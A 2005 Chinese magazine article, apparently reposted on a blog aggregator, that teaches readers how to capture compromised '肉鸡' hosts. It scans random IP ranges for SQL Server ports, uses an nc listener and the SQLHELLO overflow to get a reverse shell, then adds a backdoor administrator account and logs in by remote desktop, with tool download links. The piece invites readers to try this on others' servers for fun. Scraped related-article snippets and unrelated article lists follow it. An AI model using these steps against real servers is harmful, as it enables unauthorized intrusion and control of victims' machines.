“肉鸡”是这样获得的
文/图 温鹏
现代计算机  总第贰贰零期  [2005-10-5]
 

一个月黑风高的夜晚,笔者端庄文雅地坐在电脑旁前,看着屏幕闪烁出的入侵信息,时不时地嘴角露出微笑,又成功地抓取了一只“肉鸡”。

小知识:什么叫“肉鸡”

肉鸡是指在网络上,已经被你成功入侵的主机,并且这台机器完全受控于入侵者的任意操作,如同本机操控一样的直观顺手。但是对于网络“肉鸡”的抓取,大家可以利用IPC$特殊共享的漏洞,来远程建立空连接,并使用上传、运行的命令,激活该木马的服务端,即可使此机“摇身”变为肉鸡。

下面笔者为感兴趣的朋友演示一下如何获得“肉鸡”,本次入侵进入的主机是装有SQL数据库程序的服务器。如果读者想按笔者的方法去体验抓鸡乐趣,首先需找寻一台装有该程序的数据库。找寻方法:随意挑选一款扫描端口软件,将扫描的1433、3389端口勾选上。然后在开始扫描所设立的IP段。不一会,提示信息中所出现的IP,就是装有SQL程序的主机。

● 天罗地网——监听本机端口信息

提到网络监听,相信读者朋友,自然会想到知名的瑞士军刀——NC工具(下载地址:http://x8x.com.ru/web/QqD/downC/025654705.htm),此款软件以短小精悍著称,深受广大黑迷朋友们的青睐。为了便于今天的讲解,笔者也已将其收录到本地驱动器I盘符中。

第一步:运行NC工具,单击“开始”菜单,选择“运行”标签,会出现“运行”对话框。在“打开”标签处输入CMD命令,然后敲击“回车”键。在弹出的命令窗体中,将目录跳转到NC软件所在的位置。

第二步:在命令行处输入“NC-vv-l-p 1987 ” 的命令,然后敲击“回车”键,即可实现对本机1987端口的监听(图1)。

小提示:NC软件里的-vv参数代表,得到更详细的输入监听内容。-l代表连接端口关闭后,仍然继续监听。-p进行监听本地端口,后跟数字就是所要监听的端口号。

● 赶兔撞树——溢出攻击

“天罗地网”已经布置妥当,就等肉鸡来访。不过守株待兔自然不是聪明之举,所以需要我们牵引着小白兔来撞树。这里笔者编写了一个批处理文件,将SQLHELLO的溢出命令放置在其中,然后配合该工具的使用,实现溢出攻击,让肉鸡自投罗网。具体方法如下:

第一步:将监听本机的命令窗体,呈最小化模式,回到Windows图形界面操作。然后在硬盘驱动器中,找到事先所准备的SQLHELLO溢出程序(下载地址:http://www.sun-lion.com/down/data/soft/627.html),将其解压到程序所在的目录。

第二步:右击解压出来的1.BAT文件,选择“编辑”选项,在弹出的记事文本内容处,输入命令SQLHELLO 溢出IP地址 1433端口本机IP 监听端口(图2)。操作完毕后,单击“文件”菜单,选择“保存”选项,然后再将此窗口关闭即可。

小提示:解压出来的1.BAT文件,是用来执行SQLHELLO程序溢出的,所以大家可以按着上述批处理文件中的内容,照猫画虎地替换想要溢出、反向连接的IP。

第三步:双击刚才关闭的1.BAT文件,屏幕顿时闪过执行命令的窗体,可见批处理文件,指挥SQLHELLO溢出程序已经开始运行。这时切换到NC命令监听窗体,你会发现已经获取了对方的SHELL(图3),接下来在此远程SHELL平台中,敲入NET USER WENPENG 123456 /ADD的命令,将其“WENPENG”用户名添加到远程主机中。

第四步:然后使用NET USER Administrators WENPENG /ADD的命令,将其WENPENG这位用户提升为远程管理员,最后使用本机自带的远程终端软件,敲入刚才所提升、建立的用户进入,即可远程观看到肉鸡桌面(图4)。

小提示:当入侵者拿到远程主机的管理员权限,便可以随意远程操控该机器。在肉鸡中得到SHELL是操作系统的最外层,管理着你与操作系统交互、通讯、执行等工作的操作,假设你已经得到了对方的SHELL,也就代表着你拥有了与对方计算机直接沟通、下达命令的权力。

获取肉鸡就这么简单。当然,在实际操作时,还会碰到不同的情况与问题,要战胜它们就需要知识与经验的积累了。

“肉鸡”是这样获得的相关推荐

  1. 从Webshell到肉鸡

    从Webshell到肉鸡 S.S.F simeon    我一直都在强调一个东西,在网络攻防中最重要的就是思维,本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.n ...

  2. 啊D扫肉鸡+无远控双开XP3389 termsrvhack.dll_本地测试

    好久不玩黑了,在网上看好多菜鸟在扫肉鸡,抱怨扫不到135 !现在都是自动扫描自动传马,到现在所学的东西都是自己Google加自己总结出来的,免杀做起来比较麻烦,学习中,从不DDOS别人,不充Q币不开会 ...

  3. 小心Redis漏洞让你服务器沦为肉鸡

    小心Redis漏洞让你服务器沦为肉鸡 2016-06-23 龙果 前言 朋友的一个项目接到云服务器的告警,提示服务器已沦为肉鸡,网络带宽被大量占用,网站访问很慢,通过SSH终端远程管理服务器也频繁断开 ...

  4. 网银安全恐慌“后遗症”凸显 肉鸡检测器下载量近百万

    4月8日,记者从金山毒霸客服中心了解到,近段时间,用户对网银安全问题尤为关注.大量用户表示对网银的安全性表示担忧,网银安全恐慌"后遗症"显现. 据了解,央视今年3•15晚会曝光了受 ...

  5. 小心!你家的 IoT 设备可能已成为僵尸网络“肉鸡”

    图源 | 视觉中国 受访者 | 吴铁军 记者 | 夕颜 出品 | AI科技大本营(ID:rgznai100) 2020年,全球遭受了新冠疫情的袭击,人们的生产生活受到了极大的影响.在网络世界中,僵尸网 ...

  6. Linux服务器中木马(肉鸡)手工清除方法

    由于自己也碰到过这种情况,刚好看到这篇文章,先转载过来.的确蛮有用的哦. 首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.Ba ...

  7. 吐血原创-我用“电驴”抓肉鸡!!!

    我用"电驴"抓肉鸡 本文已被***手册杂志2007年第三期收录    我用"电驴"抓肉鸡!!难道是放一个"电驴"在路上,等"火鸡& ...

  8. 灰鸽子门徒自曝抓肉鸡内幕

    自从公开打击灰鸽子后,不少网友将他知道的内幕消息转发给我,其中有不少不法行为令人惊叹不已,对于这个黑暗的***帝国,我们原来仅仅是掀开了黑幕的一角. 1灰鸽本身的安装程序就有病毒!注意(非服务端生成的 ...

  9. 2345联盟通过流氓软件推广挖矿工具, 众多用户电脑沦为“肉鸡”

    一. 概述 12月1日,"火绒安全实验室"发出警报,一款名为"云计算"的软件,正通过各种流氓渠道大肆推广,该软件除了把用户电脑当"肉鸡"进行 ...

  10. 你的电脑已经成为肉鸡的六种现象

    金山毒霸反病毒专家总结了"肉鸡"电脑的六大现象,当网友遇到这些现象时,需提高警惕,将木马程序清除出去:      现象1:QQ,MSN的异常登录提醒      你在登录QQ时,系统 ...

最新文章

  1. 腾讯 AI Lab 开源业内最大规模多标签图像数据集
  2. 【Java】异常处理的目的
  3. 渗透测试入门1之信息收集
  4. git clone 某次提交前代码_git提交代码常用命令
  5. struts1.2上传文件到服务器
  6. oracle安装选取字符集,oracle10g字符集问题及设置PL/SQL、sqlplus字符集
  7. 我免费发布的东西,你拿去卖钱,我不平衡
  8. python抓包与解包_python 抓包与解包
  9. MVX Android设计架构浅析-MVP
  10. 关于浏览器打开时自动打开部分网页(浏览器被劫持)的解决办法
  11. 【C#】ADO.NET 实体数据模型 warning CS1591:
  12. 工业4.0革命袭来 传统工人会被机器人代替吗?
  13. hook failed (add --no-verify to bypass)
  14. 【小程序从0到1】网络数据请求——request合法域名|GET|POST|跨域?Ajax?
  15. 统计学在中国的发展与就业前景
  16. 【STC8A8K64S4A12开发板】—RS485总线通信
  17. 25个调优工具/技术网站
  18. 可将视频转换成Gif动画的相关软件
  19. BUUCTF misc 专题(29)来首歌吧
  20. ORM映射框架总结--数据库操作库(精修版)

热门文章

  1. OpenGL API - glViewport
  2. (7)OpenGL多视口变换函数:glViewport使用
  3. bwl老二吃嘲讽吗_魔兽世界BWL怀旧服老四通关技巧介绍_站位影响胜负_52pk
  4. 安装linux虚拟机桌面,Linux系统中虚拟机安装教程(图形界面)
  5. 正整数N转换成一个二进制数
  6. 深入理解Callback函数
  7. x86汇编 linux,Linux操作系统的X86汇编程序设计
  8. python中文对齐_Python 终端下中文字符对齐处理和编码续
  9. # dd 制作镜像文件
  10. JS代码实现页面切换效果(上一页+具体页+下一页)